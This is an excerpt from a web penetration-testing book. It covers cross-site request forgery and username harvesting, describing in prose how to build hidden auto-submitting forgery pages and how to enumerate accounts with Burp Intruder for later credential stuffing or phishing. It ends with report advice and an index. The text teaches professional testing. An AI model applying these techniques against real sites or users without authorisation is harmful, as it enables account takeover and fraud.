is that it doesn't break same origin policy (SOP) yet it impacts a completely
separate domain. The reason why SOP is not being broken is because the
source of the request, from the perspective of the vulnerable application, is
the victim's browser and not our malicious website hosting the image link
or JavaScript. Mentioning JavaScript is relevant because we can use it to
automatically submit a XSRF POST request unbeknownst to the victim as
soon as he browses to our malicious website.
If our payload delivery is via a malicious string in email or hoping a victim
will browse to our website, how are we to know if the attack is successful?
XSRF is actually a blind attack in the sense that we don't immediately know
if it was successful. We can certainly monitor our server logs and see when
a victim browses to our site, but we have no visibility into the transaction
request sent to the vulnerable web application, and no indicator as to whether
the victim is even currently logged into the vulnerable web application at the
182 The Penetration Tester's Guide to Web Applications
time of our attack. We can verify the attack worked by checking for the
intended result of our attack, be that a new user account being added, or a
money being sent to our bank account. While XSRF can be a powerful attack,
there are several limiting factors which expedited its removal from the top
ten list, such as the ease of implementing automated defense mechanisms
and, of course, the complexities involved with launching a successful attack.
Even with this, XSRF still remains a common vulnerability. However, an
even more common vulnerability is username harvesting.
Username harvesting, also referred to as account enumeration, is an attack
which allows us to automate the harvesting of valid (currently registered or
otherwise in-use) web application accounts; specically, account usernames.
Not only is this attack very easy to perform in most situations but it is also
very easy to identify as a aw. A common way to discover username harvest-
ing vulnerabilities is to submit an invalid username to the login, password
reset, and account creation components of the application, and observe how
the application responds. We take the exact same actions only this time we
use a valid username, and note the dierences in how the application responds
to us submitting a valid versus an invalid username. Once again, valid means
the account/username exists in the databases whereas an invalid username
still meets the requirements of a username, but has not been registered as a
user account.
This approach is predicated upon the idea that we know what at least
one valid and one invalid username is. We can have a high level of con-
dence that a username comprised of 15+ gibberish characters is probably
not valid. Conversely jsmith, [email protected], kjohnson, and other appro-
priately (depending on the context of the application) common usernames
are good starting points for testing how the application responds to a valid
username.
In modern, convenient, and user-friendly web applications, it is extremely
challenging to allow a user to create their own account or reset their password
and not be vulnerable to username harvesting. This is because the developer
and business are choosing convenience over security, meaning it is more con-
venient to clearly tell their users when a username has already been taken
rather than show a generic error message to avoid the vulnerability. Merely
communicating to the user/attacker when an account name has already been
registered is the vulnerability. Our job as attackers is to automate the guess-
ing and conrmation of a large quantity of valid usernames, and proceed
to launch additional attacks against the user accounts once armed with this
knowledge.
Beyond the OWASP Top 10 183
To reiterate the aw for clarity, image the account creation process for
gmail or any other public webmail service. When creating a new gmail ac-
count, we are presented with an account creation page which includes an
input for us to choose our desired username. Since the username will become
our email address, and each user's email address has to be unique, gmail will
not let us choose an email address which already exists. If we try to do so,
the website will clearly communicate that our desired username has already
been taken, and we must choose another one. This notication is the aw,
and we can leverage it as the indicator that a given username is valid. To
further attack the system however, we need to automate the request process
and response parsing, meaning submitting email addresses and extracting the
error message or response code to determine if an email address is currently
in use or not.
In addition to the account creation page, we want to focus on password
reset pages and login pages; anywhere the application has to make a logical
determination as to whether an account exists including authenticated pages.
Launching the attack is typically best carried out by our interception proxy,
Burp's intruder, or ZAP's fuzzer. This is because we can prime these tools
with the appropriate request, and then grep/nd the verbiage or response
code indicator in the resulting HTTP response, which we will use to make
note of the requested username being valid or invalid. The goal is to auto-
mate the attack and gather valid usernames. With a large quantity of valid
usernames, we can proceed to launch credential stung or phishing attacks.
Malicious attackers could use this same list of valid usernames to launch a
DOS attack eectively locking out all of the users by scripting multiple failed
login attempts if the application supports account lockout.
injection attacks on the form's input elds which proved to be fruitless, and
eventually turned my attention to XSRF. In reviewing the applicable post
request, I was able to determine there were no apparent XSRF protection
mechanisms in place, so using Burp's XSRF PoC functionality I generated
an attack form and proceeded to validate the vulnerability. Attacking users
of the application was not in-scope for this test, but the risk seemed clear,
the nding was valid and clearly communicated in the report to the client.
Less than 48 hours had elapsed since the report was shared with the client,
and they had already implemented a x in their production application.
They requested I retest the nding; since the report was to be used in their
PCI audit, all high-risk and medium-risk ndings were likely going to be
addressed. I logged back into my test account for the application and, with
Burp passively watching my requests, I noticed they had implemented an
anti-XSRF mechanism based on the aptly named custom parameter "anti-
xsrf-token". Upon logging out and back in, and refreshing the page, I could
see the randomness of the parameter's value seemed to be adequate as was
its length; at rst blush they seemed to have implemented a solid x. When
generating another PoC, however, I decided to simply remove the value of
the token and resubmit the request. The attack worked!
The client did a great job of setting the token, but failed to actually
check that the same token (or any token) was sent back with the transaction
request.
Figure 12.3 Search engine query results showing more than we asked for.
Exploring the method of using some custom tools to create our own list will
be useful for both creating usernames based on email addresses, and general
usernames. A logical place to start is the U.S. Census as shown in Figure
12.4.
Figure 12.4 A U.S. Census page providing links to popular surnames. Helpful indeed.
Downloading and unzipping the ZIP provides access to CVS and XLSX les,
and viewing the CSV shows the 162,253 most common names in an easy-to-
digest format. We can see the output of the le download in Figure 12.5.
Beyond the OWASP Top 10 187
Burp (In the Pro version) or ZAP to create a XSRF PoC and test the ap-
plication to determine its susceptibility. Most transactions or requests that
have to do with account provisioning, modication, deletion, passwords, -
nancial transactions, PII, PCI, and the like are candidates for being classied
as risky. However, we do need to take into account the context of the aw;
for instance, if the application doesn't protect against XSRF attacks for a re-
quest to POST to a blog, what is the risk? If we can couple the XSRF attack
with a POST request containing PII or sensitive information or even scripts
then arguably this might be a high risk nding. In other words, leveraging
XSRF to attack an application with a stored XSS string is likely a high risk.
Once browsing the application with our interception proxy running in
tandem, we want to submit the request like a normal user would (this requires
a test or compromised account) and then from within ZAP, right-click the
request and select "Generate Anti-CSRF Test FORM", as we can see in
Figure 12.7.
Figure 12.7 ZAP's interface allowing a CSRF PoC based on a POST request.
Doing this will result in a very basic HTML page with a single submit button.
When we click the submit button the exact same request we just submitted
will be submitted again. The dierence is we can and should alter the input
values to dene the values we desire; for instance, moving money from one
account to another or submitting a rewall rule. ZAP's generated PoC code
will serve as the attack framework we will ultimately get our victim to submit
for us and while it is basic, it need not be any more complex as it will be
hidden on a dierent page and ideally automatically submit without the
victim ever seeing it. An example of the PoC code is shown in Figure 12.8.
Beyond the OWASP Top 10 189
With this knowledge, let's explore some examples of both username harvest-
ing and XSRF.
Examples: Continuing with the XSRF attack, we need to host the payload
somewhere as it is a POST request, and can't be sent to the victim as easily
as a GET request. With the same idea in mind though, sending our victim
something requiring their interaction, we can send the victim a link to a
website we control. The goal would be to have the victim click the link, con-
ceivably in an email, and be directed to our website, which will be hosting
the XSRF attack and payload. Once again, identifying a XSRF vulnerability
is not overly challenging, nor is creating a suitable payload and even getting
our victim to click on a link. What can be dicult, however, is timing the
attack to coincide with a moment in time (and in the same default browser)
when the victim is logged into the vulnerable application. This is the nal
piece to the attack; the victim has to be actively logged into the application
we are attacking in order for our attack to be carried out. In a Windows
AD environment where the application we are attacking has implemented
windows pass-through authentication, XSRF is ideal as there is a high prob-
ability the user is always logged in. In other web-based applications this is
not always the case. There are some situations where we will have knowl-
edge of ideal times to launch our targeted XSRF attack, and other situations
where we need to send the attack and hope for the best, or continually host
it and indiscriminately attack users (depending on our goals). We will pro-
ceed to setup the landing/attack page without regard to the latter, as it will
be congured the same in either case. A seemingly harmless looking website
(Figure 12.9) can be used as the front-end for the XSRF attack.
190 The Penetration Tester's Guide to Web Applications
However, viewing the HTML source code of the page reveals our attack, which
is essentially the PoC from ZAP with a slight modication. Other than incor-
porating a theme and design into the HTML, we have also added JavaScript,
which is responsible for automatically submitting the POST request to the
vulnerable application as soon as the page nishes loading. By creating the
website in this manner, the victim is presented with what appears to be a
benign website while in the background our malicious code instructs the vic-
tim's browser to make the POST request of our choosing. We can see the
source code in Figure 12.10.
Figure 12.10 HTML and JavaScript used to submit the POST request.
The caveat to this method of payload delivery is that the victim's browser
will be directed to the vulnerable application upon submitting the POST
request. By adding more code to open a new tab, submitting the request
from that tab, and then closing the tab or other such concepts (possibly), we
could potentially make the attack more clandestine. Another option would
Beyond the OWASP Top 10 191
Figure 12.11 Launching a XSRF attack via a GET request and hiding any broken
image icon.
These methods work well for executing the XSRF attack in dierent circum-
stances, and can be modied to meet the needs of the attacker. Let's again
refocus our attention on some examples of exploiting username harvesting.
Recall that the goal of a username harvesting attack is to identify, with
condence in an automated way, valid application accounts. Ultimately we
will try a credential stung attack, but initially we are not trying to login
to any of the accounts. In practice most businesses (and by extension, web
applications) choose to communicate to end users when a provided username
is incorrect, and we need to be able to identify and extract this message from
the HTTP response to our login, account creation, forgotten password, or
other suitable request. Several examples of this behavior are shown in Figure
12.12.
In looking at the error messages the verbiage is clear and we can use this to
conrm a submitted username is valid. Using Burp and our browser, we will
navigate to our target application, proceed to make an initial account cre-
ation request, and view the resulting HTML. Next, we will send the previous
request to Intruder, choose the "Sniper" attack, and populate the payloads
tab with a single set of usernames. The usernames should be provided in
the format of one username per line in the le. Looking more closely at the
initial Sniper attack, we need to clear all of the predened injection points,
and choose the one single point where the submitted username resides as
this single parameter value is where we need to focus the attack. We can see
this in Figure 12.13 whereas Figure 12.14 will show the options of applicable
payloads.
Figure 12.14 Uploading our le containing usernames to Burp's payload section.
Once we properly choose the injection point and successfully input the list
of usernames we want to test, we proceed to the "Options" tab to setup a
"Grep - Match" rule which will serve as our indicator of a valid username.
We leverage the error message previously discovered, and populate the rule
with this string as long as it is unique and will only be displayed when a valid
username is submitted. Using the string "Choose a dierent address" should
suce for this example, as we can see in Figure 12.15.
Beyond the OWASP Top 10 193
Figure 12.15 Using Burp's Grep - Match option to server as an indicator of success.
Next we launch the attack by clicking "Start Attack" in the top right-hand
corner of any intruder tab. The results of the attack are shown in Figure
12.16.
Figure 12.16 Viewing results of the Intruder attack noting valid usernames.
Note the free version of Burp does not allow us to save the results, congure
granular timing for the attack, and it throttles our requests; all of these rea-
sons make using the free version almost useless in a professional engagement
but adequate for testing. We could easily reproduce this attack with a custom
script or ZAP, but we do want to have a way to save the results so we have
a denitive list of valid usernames.
Depending on the verbiage to grep for, the format of the usernames and
the like, the complexity of getting the attack to work will be inuenced
heavily by the way the web application has been implemented. While there
are not usually specic security features aimed at preventing this attack, we
will at times have to contend with session timeouts, cookie reuse issues, and
excessive request ltering protections which will slow down our attack, but
not stop it. The next logical course of action, once we have a quantity of valid
usernames, is to proceed with a credentials stung attack which works the
same way as the username harvesting attack in principal, the only dierences
being using two sets of payloads and a dierent attack type: Valid usernames,
password guesses, and a "cluster bomb" Intruder attack type. In addition,
depending on the rules of engagement and needs of the business, we can
194 The Penetration Tester's Guide to Web Applications
leverage our vast quantity of usernames to launch spear phishing attacks and
in rarer circumstances perhaps lockout user accounts.
195
196 The Penetration Tester's Guide to Web Applications
tions. The report also needs to include conrmation of the scope of targets, a
robust description of the methodology used to test, a table of contents, and
information regarding the testing dates, points of contact, and an appendix
with automated scan results and other applicable documentation.
While this has been discussed intermittently throughout the book, know
that every nding is context-specic and assigning default CVSS scores and
risk ratings to ndings is not sucient. We need to take into account the
demonstrated risk of the identied aw and produce a custom risk score
for each vulnerability we nd regardless of exploitation. One nal note on
the deliverable of the report: Prior to sending, discuss how the report is
to be delivered (encrypted, GPG, shared via the cloud, emailed). We don't
want detailed paths to exploitation of the client environment to be shared
unencrypted.
Adding value as an in-house penetration tester involves knowing our en-
vironment and establishing relationships with other teams. In fact, these are
the two main advantages in-house penetration testers have over outside con-
sultants. We want to maximize the benets of knowing what protections are
in place, how code is deployed, what servers are running which software,
where PII resides, and the like to, in eect, conduct a white box penetration
test focusing on what we already know to be the weakest links.
The other benet and way we can add value in-house is by talking to
our counterparts on the development team, our security champions, or like-
minded security conscious developers. Ideally, we want to work together to
address security shortcomings, but also to ensure a smooth test and to stay
abreast of new software being released, new technology being researched, and
timelines for incorporating xes into the codebase. In a DevSecOps environ-
ment we can also ensure our automated scanning and other security processes
are taking place, providing value and constantly being tuned to the appli-
cations in the pipeline. This concept of providing value is a nod to the fact
that security is a cost center and one of our main functions of this cost center
is to help reduce risk and keep costs lower by reducing threats, attack sur-
face, and ultimately preventing a breach or similar unwanted consequences.
We can work to accomplish these goals by gaining a deep understanding of
the environment and constraints of the business. With this knowledge we can
proceed to recommend the best course of action to protect the business. From
a consultant perspective we add value by being easy to work with, meeting
expectations, and delivering a thorough, high-quality penetration test and
accompanying report. Although a requirement, there is more to penetration
testing than technical acumen and as the human behind the tools, we are
198 The Penetration Tester's Guide to Web Applications
199
Index
API, 6, 22, 62, 72, 73, 75, 78, 92, Nikto, 155158, 174
95, 119 nmap, 102, 109, 167, 172
NoSQL Injection, 22
Black Box, 6, 146
Burp Suite, ix, 17, 21, 32, 36, 39,
60, 81, 116, 129, 140, PCI, 5, 7, 11, 35, 45, 183, 184, 188
143, 175, 192, 193 Programming Languages, 32, 77,
126, 130, 133, 144
Command Injection, 28
Cookies, 7, 32, 39, 89, 122, 125, Rules of Engagement, 5, 7, 44,
126, 131133, 175, 194 122, 168, 170, 196
Cracking, 4749, 94
Credential Stung, 35, 39, 110, SQL Injection, 9, 10, 12, 15, 17,
168, 177, 191 19
Denial of Service, 2, 75 sqlmap, 19
Deserialization, 137139, 143,
147, 148 WAF, 3, 5, 7, 35, 62, 99, 153, 170,
171, 173
Google Dorks, 82, 84, 107, 114,
186
XSRF, 121, 179181, 183, 187,
HIPAA, 5 189, 194
HITRUST, 5 XSS, 107, 119, 121, 123, 126, 131,
HSTS, 44, 45, 49, 53 136, 159
XXE, 55, 58, 59, 62, 68, 72, 76,
JWT, 90, 92, 94 139
Logging and Monitoring, 167,
168, 170, 177 ZAP, ix, 63, 65, 67, 70, 88, 92
201
Recent Titles in the Artech House
Computer Security Series
Rolf Oppliger, Series Editor
For further information on these and other Artech House titles, including previously con-
sidered out-of-print books now available through our In-Print-Forever® (IPF®) program,
contact: